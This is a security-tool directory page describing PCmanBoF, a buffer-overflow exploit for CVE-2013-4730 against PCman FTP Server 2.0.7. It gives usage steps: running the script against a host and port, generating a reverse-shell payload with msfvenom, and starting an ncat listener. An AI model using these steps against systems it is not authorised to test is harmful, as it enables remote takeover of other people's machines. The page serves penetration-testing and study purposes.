Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
PCmanBoF — A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server | Kitploit
Tools/GitHubGitHub/t0rt3ll1n0/pcmanbof
Vulnerability AnalysisExploitationShellcodePenetration TestingRemote Access ToolPayload DevelopmentBinary Exploitation
GitHubt0rt3ll1n0/pcmanbof

PCmanBoF

A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server

View Repository
215 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

PCman FTP Server Buffer overflow and Remote Code Execution [CVE-2013-4730]

A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server v.2.0.7

How it works?

That easy BoF overwrite the buffer and execute the shellcode that will connect back (reverse shell)

Vuln machines:

WindowsXP SP3 running PCman's FTP Server at version 2.0.7

launch

~$ python3 PCman.py <host> <port>

Repleace the shellcode with your own!!

~$ sudo ./msfvenom windows/shell_reverse_tcp LHOST=<your ip> LPORT=4444

Launch netcat

~$ ncat -lvp <shellcode port>

Use only on your own machine!!

Download Tool